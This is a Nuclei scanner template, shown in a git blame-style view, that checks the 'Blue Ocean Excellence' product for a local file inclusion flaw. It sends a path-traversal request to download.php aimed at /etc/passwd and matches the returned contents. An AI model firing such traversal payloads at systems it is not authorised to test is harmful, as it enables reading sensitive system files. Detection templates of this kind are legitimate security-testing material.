nuclei-templates/vulnerabilities/other/blue-ocean-excellence-lfi.yaml

26 lines
473 B
YAML
Raw Normal View History

2021-05-31 09:29:51 +00:00
id: blue-ocean-excellence-lfi
info:
name: Blue Ocean Excellence LFI
author: pikpikcu
2021-05-31 10:14:21 +00:00
severity: high
reference:
- https://blog.csdn.net/qq_41901122/article/details/116786883
2021-05-31 09:29:51 +00:00
tags: blue-ocean,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-05-31 10:14:21 +00:00
- "toor:[x*]:0:0"
2021-05-31 09:29:51 +00:00
- type: status
status:
- 200